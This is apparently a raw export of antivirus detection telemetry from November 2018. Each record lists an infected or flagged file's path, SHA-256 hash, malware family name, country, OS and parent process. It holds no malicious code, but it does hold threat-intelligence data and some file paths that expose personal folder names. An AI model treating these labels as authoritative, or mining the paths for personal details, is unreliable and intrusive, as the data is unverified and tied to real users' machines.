  Row(detection=Row(filename='tqimmdll.exe', filepath='F:\\RECYCLER_DETEC\\S-3-8-65-8402467574-3770633725-252716346-1347\\tQIMMDlL.exe', filesize=128000, name='TR/Krypt.lkfna.#M1.#R1'), hash='59a81ef27e74c2daa7f02178ab82d5925ba9e7be88bf43ce249b8f116e8914a5', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Smadav\\SMΔRTP.exe', parentsize=1552384, timestamp='2018-11-04T12:57:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='hegde sirsi-05-09-18 .exe', filepath='\\\\?\\G:\\HEGDE SIRSI-05-09-18 .EXE', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='16635418f3793f65a3739a733d3d24fe75af76761dad2aee98b39c8966d1a740', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:20:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-155120-cf962912', filepath='C:\\ProgramData\\Avira\\AntiVir Desktop\\TEMP\\AvGuardIA_6bb2b461\\AVSCAN-20181104-154942-C4D2A19E\\AVSCAN-20181104-155120-CF962912', filesize=512000, name='TR/Drop.Agent.cpg.#M1.#R1'), hash='2ffa0baef8f7fe1c15fddfbf27e2355e9ead317e07726d0bc12cd7bbfaf5eb6e', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:51:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wmplayer.exe', filepath='\\\\?\\C:\\Windows\\winsxs\\x86_microsoft-windows-mediaplayer-core_31bf3856ad364e35_6.1.7601.17514_none_0d712d0aad5bd2a0\\wmplayer.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='2370dbf0be2b388ddae72b62acd687ecdd452f26074d1db93508c30860eae8f3', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T00:13:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='7cff33717679117ac89495c154d7a464f9620c36a69e974f88c67338f1a5a172', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-04T08:26:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-143804-82b21b0b', filepath='C:\\Documents and Settings\\X\\Application Data\\Avira\\Antivirus\\TEMP\\AVSCAN-20181104-141018-1F4A17CE\\AVSCAN-20181104-143804-82B21B0B', filesize=20000, name='PUA/Linkury.Gen2.#M1.#R1'), hash='9600a7a82fa27381b6c5a23c81326e60b1b30a39d0b20feb6a066b67ef1ea05e', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T13:38:05Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-04-13-14-05.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-11-03T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T15:56:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-131200-1ab510c3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130336-F49E60EB\\AVSCAN-20181104-131200-1AB510C3', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:11:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-131614-2de009eb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130254-F168F468\\AVSCAN-20181104-131614-2DE009EB', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:16:13Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='c57193f15573e83f389017cf356e4f64a787d7f7842abe054711cc09234d2054', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-32.categorizing\\C57193F15573E83F389017CF356E4F64A787D7F7842ABE054711CC09234D2054', filesize=104000, name='HEUR/AGEN.1032151.#M1.#R1'), hash='c57193f15573e83f389017cf356e4f64a787d7f7842abe054711cc09234d2054', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T10:24:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='dc62081b2da0414c8aa90dcc7a47171781ca46a9b30c1c9241711453a65e6a79', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-32.categorizing\\DC62081B2DA0414C8AA90DCC7A47171781CA46A9B30C1C9241711453A65E6A79', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='dc62081b2da0414c8aa90dcc7a47171781ca46a9b30c1c9241711453a65e6a79', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T16:07:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-115109-baa45b06', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7cb1b58b\\AVSCAN-20181104-114609-A9428A07\\AVSCAN-20181104-115109-BAA45B06', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:51:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-011804-01ea3eba', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d0b249a1\\AVSCAN-20181104-003913-AF95EBA0\\AVSCAN-20181104-011804-01EA3EBA', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T13:16:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='lan5800wr0_lge.exe', filepath='D:\\ISMAEL\\LAN5800WR0_LGE.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='5f9c58fa91578780ab3658e472f25933a098ca5641aea2e383cba2d91d3c30d7', metadata=Row(cmdline='rtp', country='BF', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1977424, timestamp='2018-11-04T23:17:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-221402-77abd22d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-214003-0813A641\\AVSCAN-20181104-221402-77ABD22D', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:14:05Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='chromium donir', filepath='C:\\Windows\\System32\\Tasks\\Chromium donir', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='295cc060e51ac4fe40afe534703f6f4640539b8fd4972281b05c9bb101e33ec5', metadata=Row(cmdline='{3845D116-CC60-410C-8A44-D5131F1AFC4A} S-1-5-21-2139321052-1182382558-2006416534-1001:Kalij\\\\\\\\Kuser:Interactive:LUA[1]', country='LY', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\taskeng.exe', parentsize=359936, timestamp='2018-11-04T15:37:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T17:20:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp001f8edc', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp001f8edc', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T12:32:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='pp_templates_s77.com-209.exe', filepath='I:\\كمبوند\\عرض الشركة\\مساعدة 2\\شرائح\\شرائح صنع\\PP_Templates_S77.com-209\\PP_Templates_S77.com-209.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='654ede4346914dda8aae0639597b0bb0b33d448e3b5c8f3940157340404d71ae', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T06:52:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='devcon.exe', filepath='C:\\Program Files\\PowerISO\\devcon.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='5b3815d5e22a56239c63a08587d4acebae5e9ce21ae671295d9f0a79a810cca0', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:uLrF\\\\\\/V74hEqT\\\\\\/ePJ.1', country='ES', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=122560, timestamp='2018-11-04T03:08:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='service_kms.exe', filepath='C:\\Program Files\\KMSpico\\Service_KMS.exe', filesize=448000, name='TR/Kazy.157208.2.#M1.#R1'), hash='1f416428c46b91b1e1caa0bf7c99c74efdbc3c8db7e5946825d08c63569ea0b9', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='SD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-04T07:04:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wap.exe', filepath='c:\\program files\\prokaward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='9c8d0a43aa95e439cede9b69cacfb3c606381bfd6745111c5cfe73a38af9ae38', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\ProKAward\\rsasws.exe', parentsize=98304, timestamp='2018-11-04T19:57:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-182024-ef669948', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_45312470\\AVSCAN-20181104-180213-22BA0E1F\\AVSCAN-20181104-182024-EF669948', filesize=832000, name='ADWARE/Adware.Gen7.#M1.#R1'), hash='8351b9e9568e95dab403236e1bca9f5b00a6b09623090e8333f5084cae847e15', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:20:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0000124a', filepath='C:\\Windows\\Temp\\tmp00000258\\tmp0000124a', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-04T15:50:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avjebmi.exe', filepath='\\\\?\\E:\\PASTOR ELOY GARCIA C\\AppData\\Local\\avjebmi.exe', filesize=3072000, name='ADWARE/Lollipop.Gen4.#M300.#R300075'), hash='0a11464c7e25c439e48278628a11ddcb6252c622e70ffa1ec4ba74e198e4c5c0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:11:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00001248', filepath='C:\\Windows\\Temp\\tmp00000258\\tmp00001248', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-04T15:50:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='patcher.exe', filepath='D:\\Installer\\Sketchup2015\\SketchUp Pro 2015 v15.2.687 (x86)  & v15.2.685 (x64)\\SketchUp Pro 2015 v15.2.687 (32-Bit)\\Patcher.exe', filesize=320000, name='W32/Ramnit.C.#M1.#R1'), hash='214ebfd2cb0da5ca9489b715f78aa5d3e48c03c472e533f13686c3991f6cdb69', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:YFNxkgtW8keHDuRG.1', country='PH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T01:44:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-011328-d9df5222', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d0b249a1\\AVSCAN-20181104-003913-AF95EBA0\\AVSCAN-20181104-011328-D9DF5222', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T13:11:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='crashreport.exe', filepath='E:\\ulaed\\SWDownload\\Program files\\Spark Browser\\crashreport.exe', filesize=704000, name='W32/Chir.B.#M1.#R1'), hash='2a81b03ce780e415ae0282fd3eacc41e530a0ea8a79189491fe0ba288424cc89', metadata=Row(cmdline=None, country='PK', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T09:06:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0182314.exe', filepath='d:\\system volume information\\_restore{a0838581-84a6-4d91-8040-c33e0d667479}\\rp97\\A0182314.exe', filesize=256000, name='SPR/PowerReg.b1c843.#M1.#R1'), hash='b1c84398ff562cf2028555d8d497a372dc65e0739a8ec7b771608fd2667199c5', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T03:13:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\USERS\\X\\APPDATA\\ROAMING\\MICROSOFT\\WINDOWS\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='2895db15805c1a6c78b4ed6ad09c43ef2eb68a63c217e98850b1e7d73cb3fa80', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-04T22:29:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mip.exe', filepath='C:\\Program Files\\Common Files\\microsoft shared\\ink\\mip.exe', filesize=1216000, name='TR/Patched.Ren.Gen.#M300.#R2947'), hash='c0314e14090a2efb33ac8dd3fbd0f14d057934b742b575ccf03ca8319d7b6b04', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T18:03:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='start.exe', filepath='\\\\n5550\\kr-server\\廣羅\\kr-server\\server行政\\0管理部\\行政部\\工商萬用管理表格管理表格\\品質管理類\\start.exe', filesize=1536000, name='W32/Stanit.#M1.#R1'), hash='f418c582b9729b1097ce8bfce8d2f5fe2e8cf3c6f71e9108973ccbf839f7ac1e', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:1upUepgZNU2jR\\\\\\/+9.1', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T01:02:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-221513-5cb40886', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_32434990\\AVSCAN-20181102-221427-55CFC5F3\\AVSCAN-20181102-221513-5CB40886', filesize=64000, name='TR/Agent.64000.117.#M1.#R1'), hash='832eb4a864185bf214144732067e7aeb1b157e4016f2acd118fd9246385742b8', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:15:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-213255-a7e0a260', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_451ed6e6\\AVSCAN-20181102-212959-9365348A\\AVSCAN-20181102-213255-A7E0A260', filesize=2048000, name='HEUR/APC.#M1.#R1'), hash='b500de581700356962520b312158252db75db6d474ca8fd27f413334d366ed1a', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T20:32:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='similar photo cleaner', filepath='/Applications/Similar Photo Cleaner.app/Contents/MacOS/Similar Photo Cleaner', filesize=2060000, name='OSX/GT32SupportGeeks.ulklb.#M0.#R0'), hash='b68cee5ada77bb3450bd274dc23196ca5e1b7f03a4fa18e7a68112a3163a9680', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='16', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T14:06:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-150835-d5d02776', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0d7ee450\\AVSCAN-20181102-150020-68824B89\\AVSCAN-20181102-150835-D5D02776', filesize=3520000, name='HEUR/AGEN.1004753.#M1.#R1'), hash='76d78fd29cb242c3013c375f10d7debda6f2294bec9dddbef02796360c8bd36b', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T17:08:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-013246-bb1bb6aa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-013241-BA30844D\\AVSCAN-20181102-013246-BB1BB6AA', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T00:32:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='vsjbibjq.exe', filepath='c:\\users\\X\\appdata\\roaming\\vsjbibjq.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=430592, timestamp='2018-11-02T19:38:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='b2691820ae4dc5de52ba023b2b1dd363bbcd08766215983ba85f7aba77586c3a', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-29\\B2691820AE4DC5DE52BA023B2B1DD363BBCD08766215983BA85F7ABA77586C3A', filesize=1844000, name='PUA/InstallCore.Gen.#M300.#R8158'), hash='b2691820ae4dc5de52ba023b2b1dd363bbcd08766215983ba85f7aba77586c3a', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:29:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='remotecomputermanager.exe', filepath='E:\\HBCD\\Programs\\RemoteComputerManager.exe', filesize=64000, name='TR/Siggen.xihzp.#M1.#R1'), hash='a7ed3c6e720bab5155c6714d4501312d8a818f21f7aa39ca31a3c882eb00c6a5', metadata=Row(cmdline=None, country='MT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T07:21:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-211430-e2f837ad', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2eb1b43c\\AVSCAN-20181102-210813-AE62A200\\AVSCAN-20181102-211430-E2F837AD', filesize=892000, name='ADWARE/Spigot.892000.#M1.#R1'), hash='9559dc925a2a572eeeff7b5d42e1aabe49cc80f1b149b4d09d9acd8e801ff827', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T20:14:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-221536-601d892d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_32434990\\AVSCAN-20181102-221342-4F0362B5\\AVSCAN-20181102-221536-601D892D', filesize=64000, name='TR/Siggen.xihzp.#M1.#R1'), hash='a7ed3c6e720bab5155c6714d4501312d8a818f21f7aa39ca31a3c882eb00c6a5', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:15:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='deletejobprinter.exe', filepath='F:\\HBCD\\Programs\\DeleteJobPrinter.exe', filesize=64000, name='TR/Agent.64000.119.#M1.#R1'), hash='892d3d7968ba29bd8e521710a5d9a62748c78fd4436a11cbc94c1ec4fb096f02', metadata=Row(cmdline='x \\\\\\"D:\\\\\\\\JOB\\\\\\\\Keluarga Operasi Sistem\\\\\\\\Hiren + Rufus\\\\\\\\12.Hiren.s.Boot.CD.15.2.iso\\\\\\" -o\\\\\\"F:\\\\\\\\\\\\\\" -y -x![BOOT]*', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\nsh6360.tmp\\7zG.exe', parentsize=227840, timestamp='2018-11-02T08:10:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='9996d6b25c31b6dd2cbaf6a91947f59b0d53da5e5dcfb6b94946de2fd489fbaf', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T09:36:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='qs2onrda2.exe', filepath='\\\\?\\C:\\Program Files\\QS2ONRDA2H\\QS2ONRDA2.exe', filesize=832000, name='TR/Dropper.Gen.#M300.#R4133'), hash='733e354c150b4149737ae67afd29dc8e971759219779881f1f0375c6118fb5b9', metadata=Row(cmdline=None, country='KH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:18:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-141732-79130964', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a6780552\\AVSCAN-20181102-141703-76172A49\\AVSCAN-20181102-141732-79130964', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T13:17:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-141439-6ad8ead0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_43862836\\AVSCAN-20181102-141211-4F406CFD\\AVSCAN-20181102-141439-6AD8EAD0', filesize=64000, name='TR/Crypt.EPACK.Gen2.#M1.#R1'), hash='a667a34467481b7425b4838c314748951a998afb989caa8f4954c7f6a74d010d', metadata=Row(cmdline=None, country='LT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:14:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\VFP98\\DISTRIB.SRC\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='ba1c1ec10f7445b80823c5e7eda2842be32aa364630bc4aa3495259d5b04f012', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T21:31:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='9cb3c525708bf734cebff469b26c95c8c641311a1701bb9535645632d3cc6620', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\9CB3C525708BF734CEBFF469B26C95C8C641311A1701BB9535645632D3CC6620', filesize=1280000, name='HEUR/AGEN.1029502.#M1.#R1'), hash='9cb3c525708bf734cebff469b26c95c8c641311a1701bb9535645632d3cc6620', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:56:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dwtrig20.exe', filepath='C:\\Program Files (x86)\\Common Files\\microsoft shared\\DW\\DWTRIG20.EXE', filesize=476000, name='W32/Neshta.A.#M1.#R1'), hash='9cba9ef1e8dd4bb883f628fc9a51cbdbedc4ce2eb00ca42212ccce321e7d7f9e', metadata=Row(cmdline='\\\\\\/c', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Google\\Update\\GoogleUpdate.exe', parentsize=194640, timestamp='2018-11-02T03:52:08Z'), dt=datetime.date(2018, 11, 2)),
